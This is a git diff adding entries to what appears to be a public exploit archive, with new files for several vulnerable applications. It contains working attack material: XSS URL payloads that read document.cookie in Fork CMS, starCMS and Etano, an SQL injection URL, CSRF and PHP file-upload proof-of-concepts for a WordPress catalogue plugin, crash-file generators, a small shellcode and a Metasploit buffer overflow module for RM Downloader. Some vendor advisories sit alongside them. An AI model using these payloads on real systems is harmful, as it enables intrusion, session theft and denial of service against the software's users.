diff --git a/files.csv b/files.csv index 7e14feee1..16dc69a64 100755 --- a/files.csv +++ b/files.csv @@ -33284,3 +33284,18 @@ id,file,description,date,author,platform,type,port 36889,platforms/php/webapps/36889.txt,"Dotclear 2.4.1.2 /admin/blogs.php nb Parameter XSS",2012-02-29,"High-Tech Bridge SA",php,webapps,0 36890,platforms/php/webapps/36890.txt,"Dotclear 2.4.1.2 /admin/comments.php Multiple Parameter XSS",2012-02-29,"High-Tech Bridge SA",php,webapps,0 36891,platforms/php/webapps/36891.txt,"Dotclear 2.4.1.2 /admin/plugin.php page Parameter XSS",2012-02-29,"High-Tech Bridge SA",php,webapps,0 +36892,platforms/php/webapps/36892.html,"Traidnt Topics Viewer 2.0 'main.php' Cross Site Request Forgery Vulnerability",2012-02-29,"Green Hornet",php,webapps,0 +36893,platforms/php/webapps/36893.txt,"Fork CMS 3.x private/en/locale/index name Parameter XSS",2012-02-28,anonymous,php,webapps,0 +36894,platforms/php/webapps/36894.txt,"Fork CMS 3.x backend/modules/error/actions/index.php parse() Function Multiple Parameter Error Display XSS",2012-02-28,anonymous,php,webapps,0 +36895,platforms/php/webapps/36895.txt,"starCMS 'q' Parameter URI Cross Site Scripting Vulnerability",2012-03-02,Am!r,php,webapps,0 +36896,platforms/windows/dos/36896.pl,"Splash PRO 1.12.1 '.avi' File Denial of Service Vulnerability",2012-03-03,"Senator of Pirates",windows,dos,0 +36897,platforms/php/webapps/36897.txt,"LastGuru ASP GuestBook 'View.asp' SQL Injection Vulnerability",2012-03-04,demonalex,php,webapps,0 +36898,platforms/php/webapps/36898.txt,"Etano 1.20/1.22 search.php Multiple Parameter XSS",2012-03-05,"Aung Khant",php,webapps,0 +36899,platforms/php/webapps/36899.txt,"Etano 1.20/1.22 photo_search.php Multiple Parameter XSS",2012-03-05,"Aung Khant",php,webapps,0 +36900,platforms/php/webapps/36900.txt,"Etano 1.20/1.22 photo_view.php return Parameter XSS",2012-03-05,"Aung Khant",php,webapps,0 +36909,platforms/windows/local/36909.rb,"RM Downloader 2.7.5.400 - Local Buffer Overflow (MSF)",2015-05-04,"TUNISIAN CYBER",windows,local,0 +36903,platforms/ios/webapps/36903.txt,"Grindr 2.1.1 iOS - Denial of Service",2015-05-04,Vulnerability-Lab,ios,webapps,0 +36904,platforms/ios/webapps/36904.txt,"PhotoWebsite 3.1 iOS - File Include Web Vulnerability",2015-05-04,Vulnerability-Lab,ios,webapps,0 +36906,platforms/linux/dos/36906.txt,"Apache Xerces-C XML Parser < 3.1.2 - DoS POC",2015-05-04,beford,linux,dos,0 +36907,platforms/php/webapps/36907.txt,"Wordpress Ultimate Product Catalogue 3.1.2 - Multiple Persistent XSS & CSRF & File Upload",2015-05-04,"Felipe Molina",php,webapps,0 +36908,platforms/lin_x86/shellcode/36908.c,"linux/x86 - exit(0) (6 bytes)",2015-05-04,"Febriyanto Nugroho",lin_x86,shellcode,0 diff --git a/platforms/ios/webapps/36903.txt b/platforms/ios/webapps/36903.txt new file mode 100755 index 000000000..ced6b8bd4 --- /dev/null +++ b/platforms/ios/webapps/36903.txt @@ -0,0 +1,162 @@ +Document Title: +=============== +Grindr 2.1.1 iOS Bug Bounty #2 - Denial of Service Software Vulnerability + + +References (Source): +==================== +http://www.vulnerability-lab.com/get_content.php?id=1418 + + +Release Date: +============= +2015-05-02 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1418 + + +Common Vulnerability Scoring System: +==================================== +3.3 + + +Product & Service Introduction: +=============================== +Grindr, which first launched in 2009, has exploded into the largest and most popular all-male location-based social network out there. +With more than 5 million guys in 192 countries around the world -- and approximately 10,000 more new users downloading the app +every day -- you’ll always find a new date, buddy, or friend on Grindr. Grindr is a simple app that uses your mobile device’s +location-based services to show you the guys closest to you who are also on Grindr. How much of your info they see is +entirely your call. + +(Copy of the Vendor Homepage: http://grindr.com/learn-more ) + + +Abstract Advisory Information: +============================== +The Vulnerability Laboratory Research Team discovered a local and remote denial of servie vulnerability in the official Grindr v2.1.1 iOS mobile web-application. + + +Vulnerability Disclosure Timeline: +================================== +2015-01-22: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security) +2015-01-22: Vendor Notification (Grinder - Bug Bounty Program) +2015-02-02: Vendor Response/Feedback (Grinder - Bug Bounty Program) +2015-04-01: Vendor Fix/Patch (Grindr Developer Team - Reward: x & Manager: x) +2015-05-04: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Affected Product(s): +==================== +Grindr LLC +Product: Grinder - iOS Mobile Web Application (API) 2.2.1 + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +Medium + + +Technical Details & Description: +================================ +A local and remote Denial of Service vulnerability has been discovered in the official Grindr v2.1.1 iOS mobile web-application. + +The attacker injects a script code tag or multiple termination strings (%00%20%00%20%00) to the Display Name input field of the Edit Profile module. +After the inject the service stored the malicious values as DisplayName. After the inject a random user is processing to click in the profile the +contact information (facebook/twitter). After that the victim wants to copy the link and an internal service corruption occurs thats crashs the mobile app. +The issue is local and remote exploitable. + +Vulnerable Module(s): +[+] Edit Profile + +Vulnerable Parameter(s): (Input) +[+] Display Name + +Affected Module(s): +[+] Contact > Social Network > Copy Link + + + +Proof of Concept (PoC): +======================= +The denial of service web vulnerability can be exploited by remote attacker and local user accounts with low user interaction (click). +To demonstrate the vulnerability or to reproduce the issue follow the provided information and steps below to continue. + +Manual steps to reproduce ... +1. Open the grindr mobile application +2. Inject a script code tag as Display Name or use the terminated String with empty values +3. Save and click in the profile the contact button (exp. facebook) +4. Click to the send button ahead and push the Copy Link function +5. The app service is getting terminated with an uncaught exception because of an internal parsing error + +Note:To exploit the issue remotly the profile needs to be shared with another user and then the user only needs to push the same way the social contact button. + +PoC Video: + + +Solution - Fix & Patch: +======================= +First step is to prevent the issue by a secure restriction of the input. Attach a own excpetion-handling to prevent next to the insert itself. +The social network accounts that are linked do not allow special chars in the username. The grindr ios app and the android app allows to register +an account and to insert own scripts or null strings that corrupts the process of copy the link by an error. After the restriction has been +set in the code of both (api) the issue can not anymore execute to shutdown anothers users account. Even if this issue execution is prevented that +was only a solution to prevent. + +To fix the bug ... +Connect for example ios device with the running app to windows. Sync the process and reproduce the remote error and local error. Move to the iOS error +folder that has been synced. Get the error attach another debugger and so on ... + + +Security Risk: +============== +The secuirty risk of the local and remote denial of service vulnerability in the copy link function that corrupts is estimated as medium. + + +Credits & Authors: +================== +Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed +or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable +in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab +or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for +consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, +policies, deface websites, hack into databases or trade with fraud/stolen material. + +Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com +Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com +Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact +Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ + +Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to +electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by +Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website +is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact +(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. + + Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM +SERVICE: www.vulnerability-lab.com +CONTACT: research@vulnerability-lab.com +PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt + + diff --git a/platforms/ios/webapps/36904.txt b/platforms/ios/webapps/36904.txt new file mode 100755 index 000000000..ff2aaf881 --- /dev/null +++ b/platforms/ios/webapps/36904.txt @@ -0,0 +1,180 @@ +Document Title: +=============== +PhotoWebsite v3.1 iOS - File Include Web Vulnerability + + +References (Source): +==================== +http://www.vulnerability-lab.com/get_content.php?id=1474 + + +Release Date: +============= +2015-05-04 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1476 + + +Common Vulnerability Scoring System: +==================================== +6.6 + + +Product & Service Introduction: +=============================== +Photo Website lets your Camera Roll to become a website. The app let the iphone/ipad become a website. It is a wifi network app, +let you access camera roll photos over your pc browser. Now share Camera Roll to your friend is a very simple event. +Fast browsing of thumbnails + +(https://itunes.apple.com/de/app/photo-website/id543436097) + + +Abstract Advisory Information: +============================== +The Vulnerability Laboratory Research Team discovered a locla file include vulnerability in the official PhotoWebsite v3.1 iOS mobile web-application. + + +Vulnerability Disclosure Timeline: +================================== +2015-05-04: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Affected Product(s): +==================== +AirPhoto +Product: PhotoWebsite - iOS Mobile Web Application 3.1 + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Technical Details & Description: +================================ +A local file include web vulnerability has been discovered in the official PhotoWebsite v3.1 iOS mobile web-application. +The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or +system specific path commands to compromise the mobile web-application. + +The web vulnerability is located in the `mDirNameList` and `mDirUrlList` values of the `airphotos.ma - upload` module. Remote attackers are +able to inject own files with malicious `mDirNameList` values in the `upload.action` sync request to compromise the mobile web-application. +The local file/path include execution occcurs in the index file dir listing of the wifi interface. The attacker is able to inject the local +file include request by usage of the `wifi interface` in connection with the vulnerable upload service module. + +Remote attackers are also able to exploit the `mDirNameList` and `mDirUrlList` validation issue in combination with persistent injected script +codes to execute unique local malicious attack requests. The attack vector is located on the application-side of the wifi service and the +request method to inject is POST (upload) or Sync(device). To exploit the bug it is required to use the local device > wifi sync or (remote) +the wifi gui. + +The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.6. +Exploitation of the local file include vulnerability requires no user interaction or privileged web-application user account. Successful exploitation +of the local file include web vulnerability results in mobile application or device compromise. + +Request Method(s): + [+] Sync + +Vulnerable Module(s): + [+] upload + +Vulnerable File(s): + [+] airphotos.ma + +Vulnerable Parameter(s): + [+] mDirNameList + [+] mDirUrlList + +Affected Module(s): + [+] File Dir Index + + +Proof of Concept (PoC): +======================= +The local file include web vulnerability can be exploited by local attackers without privileged application user account or user interaction. +For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. + +PoC: airphotos.ma + + + +Reference(s): +http://localhost:1860/airphotos.ma + + +Solution - Fix & Patch: +======================= +The vulnerability can be patched by a secure parse and encode of the vulnerable `mDirNameList` and `mDirUrlList` values. +Restrict the input for folder and album names on sync and disallow special chars. +Encode the file dir index list that shows the malicious context without secure parse to prevent further file include or request injection attacks. + + +Security Risk: +============== +The security risk of the local file include web vulnerability in the photowebsite wifi app is estimated as high. (CVSS 6.6) + + +Credits & Authors: +================== +Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed +or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable +in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab +or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for +consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, +policies, deface websites, hack into databases or trade with fraud/stolen material. + +Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com +Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com +Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact +Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ + +Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to +electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by +Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website +is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact +(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. + + Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ + + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM +SERVICE: www.vulnerability-lab.com +CONTACT: research@vulnerability-lab.com +PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt + + diff --git a/platforms/lin_x86/shellcode/36908.c b/platforms/lin_x86/shellcode/36908.c new file mode 100755 index 000000000..e0d7cc5b2 --- /dev/null +++ b/platforms/lin_x86/shellcode/36908.c @@ -0,0 +1,14 @@ +/* + * linux/x86 exit(0) - 6 bytes + * Febriyanto Nugroho + */ + +#include + +char shellcode[] = "\xf7\xf0" + "\xcd\x80" + "\xeb\xfa"; + +int main(int argc, char **argv) { +asm("jmp %0;" : "=m" (shellcode)); +} \ No newline at end of file diff --git a/platforms/linux/dos/36906.txt b/platforms/linux/dos/36906.txt new file mode 100755 index 000000000..afc7328c4 --- /dev/null +++ b/platforms/linux/dos/36906.txt @@ -0,0 +1,82 @@ +# Exploit Title: Apache Xerces-C XML Parser (< 3.1.2) DoS POC +# Date: 2015-05-03 +# Exploit Author: beford +# Vendor Homepage: http://xerces.apache.org/#xerces-c +# Version: Versions prior to 3.1.2 +# Tested on: Ubuntu 15.04 +# CVE : CVE-2015-0252 + +Apache Xerces-C XML Parser Crashes on Malformed Input + +I believe this to be the same issue that was reported on CVE-2015-0252, +posting this in case anyone is interested in reproducing it. + +Original advisory: +https://xerces.apache.org/xerces-c/secadv/CVE-2015-0252.txt + +$ printf "\xff\xfe\x00\x00\x3c" > file.xml + +$ DOMPrint ./file.xml # Ubuntu 15.04 libxerces-c3.1 package +Segmentation fault + +$ ./DOMPrint ./file.xml # ASAN Enabled build +================================================================= +==6831==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xb5d9d87c +at pc 0x836a721 bp 0xbf8127a8 sp 0xbf812798 +READ of size 1 at 0xb5d9d87c thread T0 + #0 0x836a720 in xercesc_3_1::XMLReader::refreshRawBuffer() +xercesc/internal/XMLReader.cpp:1719 + #1 0x836a720 in xercesc_3_1::XMLReader::xcodeMoreChars(unsigned short*, +unsigned char*, unsigned int) xercesc/internal/XMLReader.cpp:1761 + #2 0x837183f in xercesc_3_1::XMLReader::refreshCharBuffer() +xercesc/internal/XMLReader.cpp:576 + #3 0x837183f in xercesc_3_1::XMLReader::peekString(unsigned short +const*) xercesc/internal/XMLReader.cpp:1223 + #4 0x83ad0ae in xercesc_3_1::ReaderMgr::peekString(unsigned short +const*) xercesc/internal/ReaderMgr.hpp:385 + #5 0x83ad0ae in xercesc_3_1::XMLScanner::checkXMLDecl(bool) +xercesc/internal/XMLScanner.cpp:1608 + #6 0x83b6469 in xercesc_3_1::XMLScanner::scanProlog() +xercesc/internal/XMLScanner.cpp:1244 + #7 0x8d69220 in +xercesc_3_1::IGXMLScanner::scanDocument(xercesc_3_1::InputSource const&) +xercesc/internal/IGXMLScanner.cpp:206 + #8 0x83cd3e7 in xercesc_3_1::XMLScanner::scanDocument(unsigned short +const*) xercesc/internal/XMLScanner.cpp:400 + #9 0x83ce728 in xercesc_3_1::XMLScanner::scanDocument(char const*) +xercesc/internal/XMLScanner.cpp:408 + #10 0x849afc5 in xercesc_3_1::AbstractDOMParser::parse(char const*) +xercesc/parsers/AbstractDOMParser.cpp:601 + #11 0x8050bf2 in main src/DOMPrint/DOMPrint.cpp:398 + #12 0xb6f5272d in __libc_start_main +(/lib/i386-linux-gnu/libc.so.6+0x1872d) + #13 0x805d3b5 (/ramdisk/DOMPrint+0x805d3b5) + +0xb5d9d87c is located 0 bytes to the right of 163964-byte region +[0xb5d75800,0xb5d9d87c) +allocated by thread T0 here: + #0 0xb72c3ae4 in operator new(unsigned int) +(/usr/lib/i386-linux-gnu/libasan.so.1+0x51ae4) + #1 0x8340cce in xercesc_3_1::MemoryManagerImpl::allocate(unsigned int) +xercesc/internal/MemoryManagerImpl.cpp:40 + #2 0x8094cb2 in xercesc_3_1::XMemory::operator new(unsigned int, +xercesc_3_1::MemoryManager*) xercesc/util/XMemory.cpp:68 + #3 0x8daaaa7 in +xercesc_3_1::IGXMLScanner::scanReset(xercesc_3_1::InputSource const&) +xercesc/internal/IGXMLScanner2.cpp:1284 + #4 0x8d6912a in +xercesc_3_1::IGXMLScanner::scanDocument(xercesc_3_1::InputSource const&) +xercesc/internal/IGXMLScanner.cpp:198 + #5 0x83cd3e7 in xercesc_3_1::XMLScanner::scanDocument(unsigned short +const*) xercesc/internal/XMLScanner.cpp:400 + #6 0x83ce728 in xercesc_3_1::XMLScanner::scanDocument(char const*) +xercesc/internal/XMLScanner.cpp:408 + #7 0x849afc5 in xercesc_3_1::AbstractDOMParser::parse(char const*) +xercesc/parsers/AbstractDOMParser.cpp:601 + #8 0x8050bf2 in main src/DOMPrint/DOMPrint.cpp:398 + #9 0xb6f5272d in __libc_start_main +(/lib/i386-linux-gnu/libc.so.6+0x1872d) + +SUMMARY: AddressSanitizer: heap-buffer-overflow +xercesc/internal/XMLReader.cpp:1719 +xercesc_3_1::XMLReader::refreshRawBuffer() diff --git a/platforms/php/webapps/36892.html b/platforms/php/webapps/36892.html new file mode 100755 index 000000000..612884e46 --- /dev/null +++ b/platforms/php/webapps/36892.html @@ -0,0 +1,18 @@ +source: http://www.securityfocus.com/bid/52224/info + +Traidnt Topics Viewer is prone to a cross-site request-forgery vulnerability. + +Exploiting this issue may allow a remote attacker to perform certain administrative actions, gain unauthorized access to the affected application, or delete certain data. Other attacks are also possible. + +Traidnt Topics Viewer 2.0 BETA 1 is vulnerable; other versions may also be affected. + + + +

by:thegreenhornet

+
+ + + +
+ diff --git a/platforms/php/webapps/36893.txt b/platforms/php/webapps/36893.txt new file mode 100755 index 000000000..803c58048 --- /dev/null +++ b/platforms/php/webapps/36893.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/52236/info + +Fork CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +Fork CMS versions prior to 3.2.7 are vulnerable. + +http://www.example.com/private/en/locale/index?name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/36894.txt b/platforms/php/webapps/36894.txt new file mode 100755 index 000000000..ecc3416e2 --- /dev/null +++ b/platforms/php/webapps/36894.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/52236/info + +Fork CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +Fork CMS versions prior to 3.2.7 are vulnerable. + +http://www.example.com/private/en/error?type=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E + +http://www.example.com/private/en/error?type=action-not-allowed&querystring=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E.1 \ No newline at end of file diff --git a/platforms/php/webapps/36895.txt b/platforms/php/webapps/36895.txt new file mode 100755 index 000000000..26826354b --- /dev/null +++ b/platforms/php/webapps/36895.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/52262/info + +starCMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +http://www.example.com/index.php?q=[Xss]&r=5&lang=de&actionsuche=yes \ No newline at end of file diff --git a/platforms/php/webapps/36897.txt b/platforms/php/webapps/36897.txt new file mode 100755 index 000000000..418f04984 --- /dev/null +++ b/platforms/php/webapps/36897.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/52293/info + +LastGuru ASP GuestBook is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/victim/View.asp?E_Mail=webmaster@lastguru.com' and 'a'='a \ No newline at end of file diff --git a/platforms/php/webapps/36898.txt b/platforms/php/webapps/36898.txt new file mode 100755 index 000000000..f2842fef4 --- /dev/null +++ b/platforms/php/webapps/36898.txt @@ -0,0 +1,31 @@ +source: http://www.securityfocus.com/bid/52295/info + +Etano is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +Etano versions 1.20 to 1.22 are vulnerable; other versions may be affected. + +http://www.example.com/etano/search.php?'";> + +http://www.example.com/etano/search.php?st='";> + +http://www.example.com/etano/search.php?f17_city='";>&f17_country=0&f17_state=0&f17_zip=3&f19=0&st=basic&wphoto=1 + +http://www.example.com/etano/search.php?f17_city=0&f17_country='";>&f17_state=0&f17_zip=3&f19=0&st=basic&wphoto=1 + +http://www.example.com/etano/search.php?f17_city=0&f17_country=0&f17_state='";>&f17_zip=3&f19=0&st=basic&wphoto=1 + +http://www.example.com/etano/search.php?f17_city=0&f17_country=0&f17_state=0&f17_zip='";>&f19=0&st=basic&wphoto=1 + +http://www.example.com/etano/search.php?f17_city=0&f17_country=0&f17_state=0&f17_zip=3&f19='";>&st=basic&wphoto=1 + +http://www.example.com/etano/search.php?f17_city=0&f17_country=0&f17_state=0&f17_zip=3&f19=0&st='";>&wphoto=1 + +http://www.example.com/etano/search.php?f17_city=0&f17_country=0&f17_state=0&f17_zip=3&f19=0&st=basic&wphoto='";> + +http://www.example.com/etano/search.php?search='";>&v=g + +http://www.example.com/etano/search.php?search=51d43831f5dde83a4eedb23895f165f6&v='";> + +http://www.example.com/etano/search.php?st=xss";>&user=unknown diff --git a/platforms/php/webapps/36899.txt b/platforms/php/webapps/36899.txt new file mode 100755 index 000000000..f55ceecb1 --- /dev/null +++ b/platforms/php/webapps/36899.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/52295/info + +Etano is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +Etano versions 1.20 to 1.22 are vulnerable; other versions may be affected. + +http://www.example.com/etano/photo_search.php?'";> + +http://www.example.com/etano/photo_search.php?st='";> \ No newline at end of file diff --git a/platforms/php/webapps/36900.txt b/platforms/php/webapps/36900.txt new file mode 100755 index 000000000..e2e85f3a9 --- /dev/null +++ b/platforms/php/webapps/36900.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/52295/info + +Etano is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +Etano versions 1.20 to 1.22 are vulnerable; other versions may be affected. + +http://www.example.com/etano/photo_view.php?photo_id=1&return=";> \ No newline at end of file diff --git a/platforms/php/webapps/36907.txt b/platforms/php/webapps/36907.txt new file mode 100755 index 000000000..7295bace2 --- /dev/null +++ b/platforms/php/webapps/36907.txt @@ -0,0 +1,144 @@ +# Exploit Title: Multiple Persistent XSS & CSRF & File Upload on Ultimate +Product Catalogue 3.1.2 +# Google Dork: inurl:"SingleProduct" intext:"Back to catalogue" +intext:"Category", +inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/" +# Date: 22/04/2015 +# Exploit Author: Felipe Molina de la Torre (@felmoltor) +# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/ +# Software Link: +https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip +# Version: <= 3.1.2, Comunicated and Fixed by the Vendor in 3.1.5 +# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache +2.4.0 (Ubuntu) +# CVE : N/A +# Category: webapps + +1. Summary: + +Ultimate Product Catalogue is a responsive and easily customizable plugin +for all your product catalogue needs. It has +63.000 downloads, +4.000 +active installations. + +Product Name and Description and File Upload formulary of plugin Ultimate +Product Catalog lacks of proper CSRF protection and proper filtering. +Allowing an attacker to alter a product pressented to a customer or the +wordpress administrators and insert XSS in his product name and +description. It also allows an attacker to upload a php script though a +CSRF due to a lack of file type filtering when uploading it. + +2. Vulnerability timeline: +- 22/04/2015: Identified in version 3.1.2 +- 22/04/2015: Comunicated to developer company etoilewebdesign.com + +- 22/04/2015: Response from etoilewebdesign.com + + and fixed two SQLi in 3.1.3 but not these vulnerabilities. + - 28/04/2015: Fixed version in 3.1.5 without notifying me. + +3. Vulnerable code: + + In file html/ProductPage multiple lines. + +3. Proof of concept: + +https://www.youtube.com/watch?v=roB_ken6U4o + + + ---------------------------------------------------------------------------------------------- + ------------- CSRF & XSS in Product Description and Name ----------- + + ---------------------------------------------------------------------------------------------- + + +
+ + + + + + + + + + + + + + +
+ + + + + ---------------------------------------------------------------------------------------------- + -------- CSRF & File Upload in Product Description and Name ------ + + ---------------------------------------------------------------------------------------------- + + + + +
+ +
+ + + +Te file cooldog.php is no available in path http:// +/wp-content/plugins/ultimate-product-catalogue/product-sheets/cooldog.php + + +4. Solution: + + Update to version 3.1.5 diff --git a/platforms/windows/dos/36896.pl b/platforms/windows/dos/36896.pl new file mode 100755 index 000000000..c3216659e --- /dev/null +++ b/platforms/windows/dos/36896.pl @@ -0,0 +1,14 @@ +source: http://www.securityfocus.com/bid/52273/info + +Splash PRO is prone to a denial-of-service vulnerability. + +Attackers can exploit this issue to crash the affected application, denying service to legitimate users. + +Splash PRO 1.12.1 is vulnerable; other versions may also be affected. + +PoC = "\x52\x49\x46\x46\x3c\xad\x08\x00\x41\x56\x49\x20\x4c\x49\x53\x54" +PoC += "\x72\x22\x00\x00\x68\x64\x72\x6c" +payload = (PoC) +f = open("Crash.avi","wb") +f.write(payload) +f.close() \ No newline at end of file diff --git a/platforms/windows/local/36909.rb b/platforms/windows/local/36909.rb new file mode 100755 index 000000000..3b3603d7a --- /dev/null +++ b/platforms/windows/local/36909.rb @@ -0,0 +1,79 @@ +### +#[+] Author: TUNISIAN CYBER +#[+] Exploit Title: RM Downloader v2.7.5.400 Local Buffer Overflow (MSF) +#[+] Date: 25-03-2015 +#[+] Type: Local Exploits +#[+] Tested on: WinXp/Windows 7 Pro +#[+] Vendor: http://software-files-a.cnet.com/s/software/10/65/60/49/Mini-streamRM-MP3Converter.exe?token=1427318981_98f71d0e10e2e3bd2e730179341feb0a&fileName=Mini-streamRM-MP3Converter.exe +#[+] Twitter: @TCYB3R +## + +## +# $Id: rmdownloader_bof.rb 2015-04-01 03:03 TUNISIAN CYBER $ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::FILEFORMAT + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Free MP3 CD Ripper 1.1 Local Buffer Overflow Exploit', + 'Description' => %q{ + This module exploits a stack buffer overflow in RM Downloader v2.7.5.400 + creating a specially crafted .ram file, an attacker may be able + to execute arbitrary code. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'TUNISIAN CYBER', # Original + 'TUNISIAN CYBER' # MSF Module + ], + 'Version' => 'Version 2.7.5.400', + 'References' => + [ + [ 'URL', 'https://www.exploit-db.com/exploits/36502/' ], + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Payload' => + { + 'Space' => 1024, + 'BadChars' => "\x00\x0a\x0d", + 'StackAdjustment' => -3500, + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Windows XP-SP3 (EN)', { 'Ret' => 0x7C9D30D7} ] + ], + 'Privileged' => false, + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('FILENAME', [ false, 'The file name.', 'msf.ram']), + ], self.class) + end + + def exploit + + sploit = rand_text_alphanumeric(35032) # Buffer Junk + sploit << [target.ret].pack('V') + sploit << make_nops(4) + sploit << payload.encoded + + tc = sploit + print_status("Creating '#{datastore['FILENAME']}' file ...") + file_create(tc) + + end + +end + \ No newline at end of file